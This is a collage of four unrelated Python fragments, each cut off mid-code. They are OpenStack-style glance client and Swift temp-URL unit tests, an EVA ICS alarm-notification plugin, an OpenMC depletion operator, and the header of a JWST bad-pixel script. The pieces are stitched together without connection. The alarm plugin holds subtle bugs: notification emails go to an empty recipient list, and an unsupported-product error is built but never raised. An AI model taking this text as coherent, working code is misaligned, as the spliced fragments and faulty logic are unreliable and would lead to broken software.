self.assertTrue(wrapped_func(self.service))
@mock.patch.object(glance_client, 'Client', autospec=True)
def test_check_image_service__no_client_set_http(self, mock_gclient):
def func(service, *args, **kwargs):
return (self.endpoint, args, kwargs)
endpoint = 'http://123.123.123.123:9292'
mock_gclient.return_value.endpoint = endpoint
self.service.client = None
params = {'image_href': '%s/image_uuid' % endpoint}
self.config(auth_strategy='keystone', group='glance')
wrapped_func = base_image_service.check_image_service(func)
self.assertEqual((endpoint, (), params),
wrapped_func(self.service, **params))
mock_gclient.assert_called_once_with(
1, endpoint,
**{'insecure': CONF.glance.glance_api_insecure,
'token': self.context.auth_token})
@mock.patch.object(glance_client, 'Client', autospec=True)
def test_get_image_service__no_client_set_https_insecure(self,
mock_gclient):
def func(service, *args, **kwargs):
return (self.endpoint, args, kwargs)
endpoint = 'https://192.168.127.12:9292'
mock_gclient.return_value.endpoint = endpoint
self.service.client = None
params = {'image_href': '%s/image_uuid' % endpoint}
self.config(auth_strategy='keystone', group='glance')
self.config(glance_api_insecure=True, group='glance')
wrapped_func = base_image_service.check_image_service(func)
self.assertEqual((endpoint, (), params),
wrapped_func(self.service, **params))
mock_gclient.assert_called_once_with(
1, endpoint,
**{'insecure': CONF.glance.glance_api_insecure,
'token': self.context.auth_token})
@mock.patch.object(glance_client, 'Client', autospec=True)
def test_get_image_service__no_client_set_https_secure(self, mock_gclient):
def func(service, *args, **kwargs):
return (self.endpoint, args, kwargs)
endpoint = 'https://192.168.127.12:9292'
mock_gclient.return_value.endpoint = endpoint
self.service.client = None
params = {'image_href': '%s/image_uuid' % endpoint}
self.config(auth_strategy='keystone', group='glance')
self.config(glance_api_insecure=False, group='glance')
self.config(glance_cafile='/path/to/certfile', group='glance')
wrapped_func = base_image_service.check_image_service(func)
self.assertEqual((endpoint, (), params),
wrapped_func(self.service, **params))
mock_gclient.assert_called_once_with(
1, endpoint,
**{'cacert': CONF.glance.glance_cafile,
'insecure': CONF.glance.glance_api_insecure,
'token': self.context.auth_token})
def _create_failing_glance_client(info):
class MyGlanceStubClient(stubs.StubGlanceClient):
"""A client that fails the first time, then succeeds."""
def get(self, image_id):
info['num_calls'] += 1
if info['num_calls'] == 1:
raise glance_exc.ServiceUnavailable('')
return {}
return MyGlanceStubClient()
class TestGlanceSwiftTempURL(base.TestCase):
def setUp(self):
super(TestGlanceSwiftTempURL, self).setUp()
client = stubs.StubGlanceClient()
self.context = context.RequestContext()
self.context.auth_token = 'fake'
self.service = service.GlanceImageService(client, 2, self.context)
self.config(swift_temp_url_key='correcthorsebatterystaple',
group='glance')
self.config(swift_endpoint_url='https://swift.example.com',
group='glance')
self.config(swift_account='AUTH_a422b2-91f3-2f46-74b7-d7c9e8958f5d30',
group='glance')
self.config(swift_api_version='v1',
group='glance')
self.config(swift_container='glance',
group='glance')
self.config(swift_temp_url_duration=1200,
group='glance')
self.config(swift_store_multiple_containers_seed=0,
group='glance')
self.fake_image = {
'id': '757274c4-2856-4bd2-bb20-9a4a231e187b'
}
@mock.patch('swiftclient.utils.generate_temp_url', autospec=True)
def test_swift_temp_url(self, tempurl_mock):
path = ('/v1/AUTH_a422b2-91f3-2f46-74b7-d7c9e8958f5d30'
'/glance'
'/757274c4-2856-4bd2-bb20-9a4a231e187b')
tempurl_mock.return_value = (
path + '?temp_url_sig=hmacsig&temp_url_expires=1400001200')
self.service._validate_temp_url_config = mock.Mock()
temp_url = self.service.swift_temp_url(image_info=self.fake_image)
self.assertEqual(CONF.glance.swift_endpoint_url
+ tempurl_mock.return_value,
temp_url)
tempurl_mock.assert_called_with(
path=path,
seconds=CONF.glance.swift_temp_url_duration,
key=CONF.glance.swift_temp_url_key,
method='GET')
@mock.patch('swiftclient.utils.generate_temp_url', autospec=True)
def test_swift_temp_url_invalid_image_info(self, tempurl_mock):
self.service._validate_temp_url_config = mock.Mock()
image_info = {}
self.assertRaises(exception.ImageUnacceptable,
self.service.swift_temp_url, image_info)
image_info = {'id': 'not an id'}
self.assertRaises(exception.ImageUnacceptable,
self.service.swift_temp_url, image_info)
self.assertFalse(tempurl_mock.called)
@mock.patch('swiftclient.utils.generate_temp_url', autospec=True)
def test_swift_temp_url_radosgw(self, tempurl_mock):
self.config(object_store_endpoint_type='radosgw', group='deploy')
path = ('/v1'
'/glance'
'/757274c4-2856-4bd2-bb20-9a4a231e187b')
tempurl_mock.return_value = (
path + '?temp_url_sig=hmacsig&temp_url_expires=1400001200')
self.service._validate_temp_url_config = mock.Mock()
temp_url = self.service.swift_temp_url(image_info=self.fake_image)
self.assertEqual(
(urlparse.urljoin(CONF.glance.swift_endpoint_url, 'swift') +
tempurl_mock.return_value),
temp_url)
tempurl_mock.assert_called_with(
path=path,
seconds=CONF.glance.swift_temp_url_duration,
key=CONF.glance.swift_temp_url_key,
method='GET')
@mock.patch('swiftclient.utils.generate_temp_url', autospec=True)
def test_swift_temp_url_radosgw_endpoint_with_swift(self, tempurl_mock):
self.config(swift_endpoint_url='https://swift.radosgw.com/swift',
group='glance')
self.config(object_store_endpoint_type='radosgw', group='deploy')
path = ('/v1'
'/glance'
'/757274c4-2856-4bd2-bb20-9a4a231e187b')
tempurl_mock.return_value = (
path + '?temp_url_sig=hmacsig&temp_url_expires=1400001200')
self.service._validate_temp_url_config = mock.Mock()
temp_url = self.service.swift_temp_url(image_info=self.fake_image)
self.assertEqual(
CONF.glance.swift_endpoint_url + tempurl_mock.return_value,
temp_url)
tempurl_mock.assert_called_with(
path=path,
seconds=CONF.glance.swift_temp_url_duration,
key=CONF.glance.swift_temp_url_key,
method='GET')
@mock.patch('swiftclient.utils.generate_temp_url', autospec=True)
def test_swift_temp_url_radosgw_endpoint_invalid(self, tempurl_mock):
self.config(swift_endpoint_url='https://swift.radosgw.com/eggs/',
group='glance')
self.config(object_store_endpoint_type='radosgw', group='deploy')
self.service._validate_temp_url_config = mock.Mock()
self.assertRaises(exception.InvalidParameterValue,
self.service.swift_temp_url,
self.fake_image)
self.assertFalse(tempurl_mock.called)
@mock.patch('swiftclient.utils.generate_temp_url', autospec=True)
def test_swift_temp_url_multiple_containers(self, tempurl_mock):
self.config(swift_store_multiple_containers_seed=8,
group='glance')
path = ('/v1/AUTH_a422b2-91f3-2f46-74b7-d7c9e8958f5d30'
'/glance_757274c4'
'/757274c4-2856-4bd2-bb20-9a4a231e187b')
tempurl_mock.return_value = (
path + '?temp_url_sig=hmacsig&temp_url_expires=1400001200')
self.service._validate_temp_url_config = mock.Mock()
temp_url = self.service.swift_temp_url(image_info=self.fake_image)
self.assertEqual(CONF.glance.swift_endpoint_url
+ tempurl_mock.return_value,
temp_url)
tempurl_mock.assert_called_with(
path=path,
seconds=CONF.glance.swift_temp_url_duration,
key=CONF.glance.swift_temp_url_key,
method='GET')
def test_swift_temp_url_url_bad_no_info(self):
self.assertRaises(exception.ImageUnacceptable,
self.service.swift_temp_url,
image_info={})
def test__validate_temp_url_config(self):
self.service._validate_temp_url_config()
def test__validate_temp_url_key_exception(self):
self.config(swift_temp_url_key=None, group='glance')
self.assertRaises(exception.MissingParameterValue,
self.service._validate_temp_url_config)
def test__validate_temp_url_endpoint_config_exception(self):
self.config(swift_endpoint_url=None, group='glance')
self.assertRaises(exception.MissingParameterValue,
self.service._validate_temp_url_config)
def test__validate_temp_url_account_exception(self):
self.config(swift_account=None, group='glance')
self.assertRaises(exception.MissingParameterValue,
self.service._validate_temp_url_config)
def test__validate_temp_url_no_account_exception_radosgw(self):
self.config(swift_account=None, group='glance')
self.config(object_store_endpoint_type='radosgw', group='deploy')
self.service._validate_temp_url_config()
def test__validate_temp_url_endpoint_less_than_download_delay(self):
self.config(swift_temp_url_expected_download_start_delay=1000,
group='glance')
self.config(swift_temp_url_duration=15,
group='glance')
self.assertRaises(exception.InvalidParameterValue,
self.service._validate_temp_url_config)
def test__validate_temp_url_multiple_containers(self):
self.config(swift_store_multiple_containers_seed=-1,
group='glance')
self.assertRaises(exception.InvalidParameterValue,
self.service._validate_temp_url_config)
self.config(swift_store_multiple_containers_seed=None,
group='glance')
self.assertRaises(exception.InvalidParameterValue,
self.service._validate_temp_url_config)
self.config(swift_store_multiple_containers_seed=33,
group='glance')
self.assertRaises(exception.InvalidParameterValue,
self.service._validate_temp_url_config)
class TestSwiftTempUrlCache(base.TestCase):
def setUp(self):
super(TestSwiftTempUrlCache, self).setUp()
| |
__author__ = 'Altertech, https://www.altertech.com/'
__copyright__ = 'Copyright (C) 2012-2020 Altertech'
__license__ = 'Apache License 2.0'
__version__ = '0.0.3'
import eva.pluginapi as pa
import sqlalchemy as sa
import threading
import time
from neotasker import g, background_worker
from eva.client import apiclient
from functools import partial
# undocummented internal function, don't use in own plugins
import eva.mailer
import eva.core
sql = sa.text
from types import SimpleNamespace
db_lock = threading.RLock()
flags = SimpleNamespace(ready=False, db=None)
logger = pa.get_logger()
# undocummented thread-local, don't use in own plugins
def get_db():
with db_lock:
if not g.has('x_alarmer_db'):
g.x_alarmer_db = flags.db.connect()
else:
try:
g.x_alarmer_db.execute('select 1')
except:
try:
g.userdb.close()
except:
pass
g.x_alarmer_db = flags.db.connect()
return g.x_alarmer_db
def get_level_name(level):
return 'WARNING' if level == 1 else 'ALARM'
def notify(alarm_id, level):
level = int(level)
lv = pa.api_call('state', i=f'lvar:alarmer/{alarm_id}', full=True)
db = get_db()
try:
db.execute(sql(
'insert into alarmer_log'
'(u, utp, key_id, alarm_id, description, action, t, level)'
'values (:u, :utp, :key_id, :alarm_id, :d, :action, :t, :level)'),
u='',
utp='',
key_id='',
alarm_id=alarm_id,
d=lv['description'],
action='T',
t=time.time(),
level=level)
except:
logger.error(f'Unable to insert log record for alarm: {alarm_id}')
pa.log_traceback()
try:
if lv['status'] == 1:
cur_value = lv['value']
if cur_value:
cur_value = int(cur_value)
else:
cur_value = 0
if cur_value >= level:
logger.info('Skipping alarm notifications, '
f'already triggered: {alarm_id}')
else:
pa.api_call('set', i=f'lvar:alarmer/{alarm_id}', v=level)
logger.warning('Alarm triggered: '
f'{alarm_id}, level: {get_level_name(level)}')
r = db.execute(sql('select u, utp from alarmer_sub '
'where alarm_id=:i and level<=:level'),
i=alarm_id,
level=level)
recip = []
subject = f'{get_level_name(level)}: {lv["description"]}'
text = (f'{get_level_name(level)}: {lv["description"]} '
f'({alarm_id})\n'
f'System: {eva.core.config.system_name}')
sendmail = partial(eva.mailer.send, subject=subject, text=text)
while True:
ui = r.fetchone()
if ui:
r2 = db.execute(sql('select value from userinfo where '
'name=:name and u=:u and utp=:utp'),
name=flags.userinfo_email_field,
u=ui.u,
utp=ui.utp)
while True:
d = r2.fetchone()
if d:
logger.debug(
f'sending alarm email to {d.value}')
sendmail(rcp=recip)
else:
break
else:
break
else:
logger.debug(f'Inactive alarm triggered: {alarm_id}')
except:
logger.error(f'Unable to send notifications for alarm: {alarm_id}')
pa.log_traceback()
raise
def init(config, **kwargs):
logger.debug('alarmer plugin loaded')
pa.register_apix(APIFuncs(), sys_api=False)
p = pa.get_product()
# undocummented internal function, don't use in own plugins
from eva.core import create_db_engine, format_db_uri
db = format_db_uri(config['db'])
flags.db = create_db_engine(db)
logger.debug(f'alarmer.db = {db}')
if p.code == 'lm':
pa.register_lmacro_object('notify', notify)
flags.keep_log = int(config.get('keep_log', 86400))
logger.debug(f'alarmer.keep_log = {flags.keep_log}')
flags.userinfo_email_field = config.get('userinfo_email_field', 'email')
logger.debug(
f'alarmer.userinfo_email_field = {flags.userinfo_email_field}')
elif p.code == 'sfa':
lm = config['lm']
if not lm.startswith('lm/'):
lm = 'lm/' + lm
logger.debug(f'alarmer.lm = {lm}')
flags.lm = lm
pa.register_apix(APIFuncs(), sys_api=False)
else:
RuntimeError(f'product not supported: {p}')
flags.ready = True
def before_start(**kwargs):
dbconn = get_db()
meta = sa.MetaData()
t_alarmer_sub = sa.Table(
'alarmer_sub', meta, sa.Column('u', sa.String(128), primary_key=True),
sa.Column('utp', sa.String(32), primary_key=True),
sa.Column('alarm_id', sa.String(256), primary_key=True),
sa.Column('level', sa.Integer()))
t_alarmer_log = sa.Table(
'alarmer_log', meta, sa.Column('u', sa.String(128), primary_key=True),
sa.Column('utp', sa.String(32), primary_key=True),
sa.Column('key_id', sa.String(64), primary_key=True),
sa.Column('alarm_id', sa.String(256), primary_key=True),
sa.Column('description', sa.String(256), primary_key=True),
sa.Column('action', sa.String(1), primary_key=True),
sa.Column('t', sa.Float(), primary_key=True),
sa.Column('level', sa.Integer(), primary_key=True))
try:
meta.create_all(dbconn)
except:
pa.log_traceback()
logger.error('unable to create alarme tables in db')
def start(**kwargs):
if pa.get_product().code == 'lm':
log_cleaner.start()
def stop(**kwargs):
if pa.get_product().code == 'lm':
log_cleaner.stop()
class APIFuncs(pa.APIX):
"""
ACL:
- to receive alarm events in UI, user must have r/o access to alarm
lvar
- to disable/enable/acknowledge user must have rw access to alarm lvar
- to create / edit / destroy alarms master key is required
If alarm lvar has status = 0, the plugin considers the alarm as disabled
"""
@pa.api_log_i
def subscribe(self, **kwargs):
k, i, l = pa.parse_function_params(kwargs, 'kil', 'SSI')
lvar = pa.get_item(f'lvar:alarmer/{i}')
if l < 1 or l > 2:
raise pa.InvalidParameter('param "l" should be 1 or 2')
if not lvar:
raise pa.ResourceNotFound
if not pa.key_check(k, lvar, ro_op=True):
raise pa.AccessDenied
db = get_db()
u = pa.get_aci('u')
if not u:
raise pa.FunctionFailed('user is not logged in')
utp = pa.get_aci('utp')
if not utp:
utp = ''
kw = {'u': u, 'utp': utp, 'alarm_id': i, 'level': l}
if db.execute(
sql('select alarm_id from alarmer_sub where u=:u '
'and utp=:utp and alarm_id=:alarm_id'), **kw).fetchone():
db.execute(
sql('update alarmer_sub set level=:level '
'where u=:u and utp=:utp and alarm_id=:alarm_id'), **kw)
else:
db.execute(
sql('insert into alarmer_sub(u, utp, alarm_id, level) '
'values (:u, :utp, :alarm_id, :level)'), **kw)
return True
@pa.api_log_i
def unsubscribe(self, **kwargs):
k, i = pa.parse_function_params(kwargs, 'ki', 'SS')
lvar = pa.get_item(f'lvar:alarmer/{i}')
if not lvar:
raise pa.ResourceNotFound
if not pa.key_check(k, lvar, ro_op=True):
raise pa.AccessDenied
db = get_db()
u = pa.get_aci('u')
if not u:
raise pa.FunctionFailed('user is not logged in')
utp = pa.get_aci('utp')
if not utp:
utp = ''
kw = {'u': u, 'utp': utp, 'alarm_id': i}
db.execute(
sql('delete from alarmer_sub where u=:u '
'and utp=:utp and alarm_id=:alarm_id'), **kw)
return True
@pa.api_log_i
def list_subscriptions(self, **kwargs):
u = pa.get_aci('u')
if not u:
raise pa.FunctionFailed('user is not logged in')
utp = pa.get_aci('utp')
if not utp:
utp = ''
kw = {'u': u, 'utp': utp}
db = get_db()
return [
dict(x) for x in db.execute(
sql('select alarm_id, level '
'from alarmer_sub where u=:u and utp=:utp'), **kw)
]
@pa.api_log_i
@pa.api_need_master
def create(self, **kwargs):
u, d, g, rw, ra, save = pa.parse_api_params(kwargs, 'udgwaS', 'sssRRb')
import uuid
alarm_id = u if u else str(uuid.uuid4())
alarm_full_id = f'{g if g else ""}{"/" if g else ""}{alarm_id}'
lvar_id = f'alarmer{"/" if g else ""}{g if g else ""}/{alarm_id}'
try:
result = pa.api_call('management_api_call',
i=flags.lm,
f='create_lvar',
p={
'i': lvar_id,
'save': save and not d
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(f'unable to create lvar {lvar_id} at'
f' {flags.lm} ({result["code"]})')
if d:
result = pa.api_call('management_api_call',
i=flags.lm,
f='set_prop',
p={
'i': lvar_id,
'p': 'description',
'v': d,
'save': save
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(
f'unable to set lvar description {lvar_id} at '
f'{flags.lm} ({result["code"]})')
result = pa.api_call('management_api_call',
i=flags.lm,
f='create_rule',
p={
'u': f'{alarm_id}_w',
'v': rw
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(
f'unable to create warning rule {alarm_id}w at '
f'{flags.lm} ({result["code"]})')
result = pa.api_call('management_api_call',
i=flags.lm,
f='set_rule_prop',
p={
'i': f'{alarm_id}_w',
'v': {
'description': d,
'macro': '@x_alarmer_notify',
'macro_args': [alarm_full_id, 1],
'priority': 1,
'enabled': True
},
'save': save
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(
f'unable to set warning rule {alarm_id}_w props '
f'at {flags.lm} ({result["code"]})')
result = pa.api_call('management_api_call',
i=flags.lm,
f='create_rule',
p={
'u': f'{alarm_id}_a',
'v': ra
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(
f'unable to create alarm rule {alarm_id}w at '
f'{flags.lm} ({result["code"]})')
result = pa.api_call('management_api_call',
i=flags.lm,
f='set_rule_prop',
p={
'i': f'{alarm_id}_a',
'v': {
'description': d,
'macro': '@x_alarmer_notify',
'macro_args': [alarm_full_id, 2],
'priority': 1,
'enabled': True
},
'save': save
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(
f'unable to set alarm rule {alarm_id}_a props '
f'at {flags.lm} ({result["code"]})')
pa.api_call('reload_controller', i=flags.lm)
except:
pa.log_traceback()
destroy_alarm(f'{g if g else ""}{"/" if g else ""}{alarm_id}')
raise
return {'id': alarm_full_id, 'lvar_id': lvar_id}
@pa.api_log_i
@pa.api_need_master
def set_description(self, **kwargs):
i, d, save = pa.parse_api_params(kwargs, 'idS', 'Ssb')
lvar_id = f'lvar:alarmer/{i}'
rule_id = i.rsplit('/')[-1]
result = pa.api_call('management_api_call',
i=flags.lm,
f='set_prop',
p={
'i': lvar_id,
'p': 'description',
'v': d,
'save': save
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(
f'unable to set lvar description {lvar_id} at '
f'{flags.lm} ({result["code"]})')
for rtp in ['w', 'a']:
result = pa.api_call('management_api_call',
i=flags.lm,
f='set_rule_prop',
p={
'i': f'{rule_id}_{rtp}',
'p': 'description',
'v': d,
'save': save
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(
f'unable to set rule description {rule_id}_{rtp} at '
f'{flags.lm} ({result["code"]})')
pa.api_call('reload_controller', i=flags.lm)
return True
@pa.api_log_i
@pa.api_need_master
def set_rule_props(self, **kwargs):
i, rw, ra, save = pa.parse_api_params(kwargs, 'iwaS', 'S..b')
rule_id = i.rsplit('/')[-1]
if rw:
result = pa.api_call('management_api_call',
i=flags.lm,
f='set_rule_prop',
p={
'i': f'{rule_id}_w',
'v': rw,
'save': save
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(
f'unable to set warning rule props {rule_id}_w at '
f'{flags.lm} ({result["code"]})')
if ra:
result = pa.api_call('management_api_call',
i=flags.lm,
f='set_rule_prop',
p={
'i': f'{rule_id}_a',
'v': ra,
'save': save
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(
f'unable to set alarm rule props {rule_id}_a at '
f'{flags.lm} ({result["code"]})')
return True
@pa.api_log_i
@pa.api_need_master
def list_rule_props(self, **kwargs):
i = pa.parse_api_params(kwargs, 'i', 'S')
rules = {}
rule_id = i.rsplit('/')[-1]
for rtp in ['w', 'a']:
result = pa.api_call('management_api_call',
i=flags.lm,
f='list_rule_props',
p={
'i': f'{rule_id}_{rtp}',
})
if result['code'] != apiclient.result_ok:
raise pa.FunctionFailed(
f'unable to list rule props {rule_id}_{rtp} at '
f'{flags.lm} ({result["code"]})')
d = result['data']
for x in [
'enabled', 'macro', 'macro_args', 'macro_kwargs', 'priority'
]:
try:
del d[x]
except KeyError:
pass
rules['r' + rtp] = d
return rules
@pa.api_log_w
@pa.api_need_master
def destroy(self, **kwargs):
i = pa.parse_api_params(kwargs, 'i', 'S')
return destroy_alarm(i)
@pa.api_log_i
def ack(self, **kwargs):
k, i = pa.parse_function_params(kwargs, 'ki', 'SS')
lvar = pa.get_item(f'lvar:alarmer/{i}')
if not lvar:
raise pa.ResourceNotFound
if not pa.key_check(k, lvar):
raise pa.AccessDenied
lv | |
Total atoms to be used in function.
source_rate : float
Power in [W] or source rate in [neutron/sec]
Returns
-------
openmc.deplete.OperatorResult
Eigenvalue and reaction rates resulting from transport operator
"""
# Reset results in OpenMC
openmc.lib.reset()
# Update the number densities regardless of the source rate
self.number.set_density(vec)
self._update_materials()
# If the source rate is zero, return zero reaction rates without running
# a transport solve
if source_rate == 0.0:
rates = self.reaction_rates.copy()
rates.fill(0.0)
return OperatorResult(ufloat(0.0, 0.0), rates)
# Prevent OpenMC from complaining about re-creating tallies
openmc.reset_auto_ids()
# Update tally nuclides data in preparation for transport solve
nuclides = self._get_tally_nuclides()
self._rate_helper.nuclides = nuclides
self._normalization_helper.nuclides = nuclides
self._yield_helper.update_tally_nuclides(nuclides)
# Run OpenMC
openmc.lib.run()
openmc.lib.reset_timers()
# Extract results
op_result = self._unpack_tallies_and_normalize(source_rate)
return copy.deepcopy(op_result)
@staticmethod
def write_bos_data(step):
"""Write a state-point file with beginning of step data
Parameters
----------
step : int
Current depletion step including restarts
"""
openmc.lib.statepoint_write(
"openmc_simulation_n{}.h5".format(step),
write_source=False)
def _differentiate_burnable_mats(self):
"""Assign distribmats for each burnable material
"""
# Count the number of instances for each cell and material
self.geometry.determine_paths(instances_only=True)
# Extract all burnable materials which have multiple instances
distribmats = set(
[mat for mat in self.geometry.get_all_materials().values()
if mat.depletable and mat.num_instances > 1])
for mat in distribmats:
if mat.volume is None:
raise RuntimeError("Volume not specified for depletable "
"material with ID={}.".format(mat.id))
mat.volume /= mat.num_instances
if distribmats:
# Assign distribmats to cells
for cell in self.geometry.get_all_material_cells().values():
if cell.fill in distribmats:
mat = cell.fill
cell.fill = [mat.clone()
for i in range(cell.num_instances)]
def _get_burnable_mats(self):
"""Determine depletable materials, volumes, and nuclides
Returns
-------
burnable_mats : list of str
List of burnable material IDs
volume : OrderedDict of str to float
Volume of each material in [cm^3]
nuclides : list of str
Nuclides in order of how they'll appear in the simulation.
"""
burnable_mats = set()
model_nuclides = set()
volume = OrderedDict()
self.heavy_metal = 0.0
# Iterate once through the geometry to get dictionaries
for mat in self.geometry.get_all_materials().values():
for nuclide in mat.get_nuclides():
model_nuclides.add(nuclide)
if mat.depletable:
burnable_mats.add(str(mat.id))
if mat.volume is None:
raise RuntimeError("Volume not specified for depletable "
"material with ID={}.".format(mat.id))
volume[str(mat.id)] = mat.volume
self.heavy_metal += mat.fissionable_mass
# Make sure there are burnable materials
if not burnable_mats:
raise RuntimeError(
"No depletable materials were found in the model.")
# Sort the sets
burnable_mats = sorted(burnable_mats, key=int)
model_nuclides = sorted(model_nuclides)
# Construct a global nuclide dictionary, burned first
nuclides = list(self.chain.nuclide_dict)
for nuc in model_nuclides:
if nuc not in nuclides:
nuclides.append(nuc)
return burnable_mats, volume, nuclides
def _extract_number(self, local_mats, volume, nuclides, prev_res=None):
"""Construct AtomNumber using geometry
Parameters
----------
local_mats : list of str
Material IDs to be managed by this process
volume : OrderedDict of str to float
Volumes for the above materials in [cm^3]
nuclides : list of str
Nuclides to be used in the simulation.
prev_res : ResultsList, optional
Results from a previous depletion calculation
"""
self.number = AtomNumber(local_mats, nuclides, volume, len(self.chain))
if self.dilute_initial != 0.0:
for nuc in self._burnable_nucs:
self.number.set_atom_density(np.s_[:], nuc, self.dilute_initial)
# Now extract and store the number densities
# From the geometry if no previous depletion results
if prev_res is None:
for mat in self.geometry.get_all_materials().values():
if str(mat.id) in local_mats:
self._set_number_from_mat(mat)
# Else from previous depletion results
else:
for mat in self.geometry.get_all_materials().values():
if str(mat.id) in local_mats:
self._set_number_from_results(mat, prev_res)
def _set_number_from_mat(self, mat):
"""Extracts material and number densities from openmc.Material
Parameters
----------
mat : openmc.Material
The material to read from
"""
mat_id = str(mat.id)
for nuclide, density in mat.get_nuclide_atom_densities().values():
number = density * 1.0e24
self.number.set_atom_density(mat_id, nuclide, number)
def _set_number_from_results(self, mat, prev_res):
"""Extracts material nuclides and number densities.
If the nuclide concentration's evolution is tracked, the densities come
from depletion results. Else, densities are extracted from the geometry
in the summary.
Parameters
----------
mat : openmc.Material
The material to read from
prev_res : ResultsList
Results from a previous depletion calculation
"""
mat_id = str(mat.id)
# Get nuclide lists from geometry and depletion results
depl_nuc = prev_res[-1].nuc_to_ind
geom_nuc_densities = mat.get_nuclide_atom_densities()
# Merge lists of nuclides, with the same order for every calculation
geom_nuc_densities.update(depl_nuc)
for nuclide in geom_nuc_densities.keys():
if nuclide in depl_nuc:
concentration = prev_res.get_atoms(mat_id, nuclide)[1][-1]
volume = prev_res[-1].volume[mat_id]
number = concentration / volume
else:
density = geom_nuc_densities[nuclide][1]
number = density * 1.0e24
self.number.set_atom_density(mat_id, nuclide, number)
def initial_condition(self):
"""Performs final setup and returns initial condition.
Returns
-------
list of numpy.ndarray
Total density for initial conditions.
"""
# Create XML files
if comm.rank == 0:
self.geometry.export_to_xml()
self.settings.export_to_xml()
self._generate_materials_xml()
# Initialize OpenMC library
comm.barrier()
if not openmc.lib.is_initialized:
openmc.lib.init(intracomm=comm)
# Generate tallies in memory
materials = [openmc.lib.materials[int(i)]
for i in self.burnable_mats]
self._rate_helper.generate_tallies(materials, self.chain.reactions)
self._normalization_helper.prepare(
self.chain.nuclides, self.reaction_rates.index_nuc)
# Tell fission yield helper what materials this process is
# responsible for
self._yield_helper.generate_tallies(
materials, tuple(sorted(self._mat_index_map.values())))
# Return number density vector
return list(self.number.get_mat_slice(np.s_[:]))
def finalize(self):
"""Finalize a depletion simulation and release resources."""
if self.cleanup_when_done:
openmc.lib.finalize()
def _update_materials(self):
"""Updates material compositions in OpenMC on all processes."""
for rank in range(comm.size):
number_i = comm.bcast(self.number, root=rank)
for mat in number_i.materials:
nuclides = []
densities = []
for nuc in number_i.nuclides:
if nuc in self.nuclides_with_data:
val = 1.0e-24 * number_i.get_atom_density(mat, nuc)
# If nuclide is zero, do not add to the problem.
if val > 0.0:
if self.round_number:
val_magnitude = np.floor(np.log10(val))
val_scaled = val / 10**val_magnitude
val_round = round(val_scaled, 8)
val = val_round * 10**val_magnitude
nuclides.append(nuc)
densities.append(val)
else:
# Only output warnings if values are significantly
# negative. CRAM does not guarantee positive values.
if val < -1.0e-21:
print("WARNING: nuclide ", nuc, " in material ", mat,
" is negative (density = ", val, " at/barn-cm)")
number_i[mat, nuc] = 0.0
# Update densities on C API side
mat_internal = openmc.lib.materials[int(mat)]
mat_internal.set_densities(nuclides, densities)
#TODO Update densities on the Python side, otherwise the
# summary.h5 file contains densities at the first time step
def _generate_materials_xml(self):
"""Creates materials.xml from self.number.
Due to uncertainty with how MPI interacts with OpenMC API, this
constructs the XML manually. The long term goal is to do this
through direct memory writing.
"""
materials = openmc.Materials(self.geometry.get_all_materials()
.values())
# Sort nuclides according to order in AtomNumber object
nuclides = list(self.number.nuclides)
for mat in materials:
mat._nuclides.sort(key=lambda x: nuclides.index(x[0]))
# Grab the cross sections tag from the existing file
mfile = Path("materials.xml")
if mfile.exists():
tree = ET.parse(str(mfile))
xs = tree.find('cross_sections')
if xs is not None:
materials.cross_sections = xs.text
materials.export_to_xml()
def _get_tally_nuclides(self):
"""Determine nuclides that should be tallied for reaction rates.
This method returns a list of all nuclides that have neutron data and
are listed in the depletion chain. Technically, we should tally nuclides
that may not appear in the depletion chain because we still need to get
the fission reaction rate for these nuclides in order to normalize
power, but that is left as a future exercise.
Returns
-------
list of str
Tally nuclides
"""
nuc_set = set()
# Create the set of all nuclides in the decay chain in materials marked
# for burning in which the number density is greater than zero.
for nuc in self.number.nuclides:
if nuc in self.nuclides_with_data:
if np.sum(self.number[:, nuc]) > 0.0:
nuc_set.add(nuc)
# Communicate which nuclides have nonzeros to rank 0
if comm.rank == 0:
for i in range(1, comm.size):
nuc_newset = comm.recv(source=i, tag=i)
nuc_set |= nuc_newset
else:
comm.send(nuc_set, dest=0, tag=comm.rank)
if comm.rank == 0:
# Sort nuclides in the same order as self.number
nuc_list = [nuc for nuc in self.number.nuclides
if nuc in nuc_set]
else:
nuc_list = None
# Store list of tally nuclides on each process
nuc_list = comm.bcast(nuc_list)
return [nuc for nuc in nuc_list if nuc in self.chain]
def _unpack_tallies_and_normalize(self, source_rate):
"""Unpack tallies from OpenMC and return an operator result
This method uses OpenMC's C API bindings to determine the k-effective
value and reaction rates from the simulation. The reaction rates are
normalized by a helper class depending on the method being used.
Parameters
----------
source_rate : float
Power in [W] or source rate in [neutron/sec]
Returns
-------
openmc.deplete.OperatorResult
Eigenvalue and reaction rates resulting from transport operator
"""
rates = self.reaction_rates
rates.fill(0.0)
# Get k and | |
#! /usr/bin/env python
"""Find bad pixels from dark current files
Start with a stack of dark ramps and slope images?
Or maybe a stack of ramps that have been processed through the jump step
and then ramp-fitting is performed here?
Input for the dark current reference file step is going to be a stack
of ramps. So maybe use that and ramp-fit here.
inputs:
1. list of dark current ramps that have been run through jump step
2. list of same exposures after ramp-fitting has been done
Plot summary:
0. Check to see if IPC correction has been run
1. Look through stack of slopes images, get mean and rms per pixel
(do we sigma-clip the inputs or not?)
2. Potential bad pixels are those with noise values above some threshold
NOTE: when producing slope images of these data, make sure to save the
optional output parameters into the *fitopt.fits files.
https://jwst-pipeline.readthedocs.io/en/stable/jwst/ramp_fitting/main.html?highlight=intercept
"A third, optional output product is also available and is produced only when the step parameter ‘save_opt’ is True"
"""
from astropy.io import fits
from astropy.stats import sigma_clip
import copy
import os
from jwst.datamodels import dqflags
import numpy as np
from os import path
import matplotlib.pyplot as plt
from scipy.stats import sigmaclip
import matplotlib.cm as cm
from jwst_reffiles.bad_pixel_mask.badpix_from_flats import create_dqdef
from jwst_reffiles.utils import dq_flags
from jwst_reffiles.utils.constants import RATE_FILE_SUFFIXES
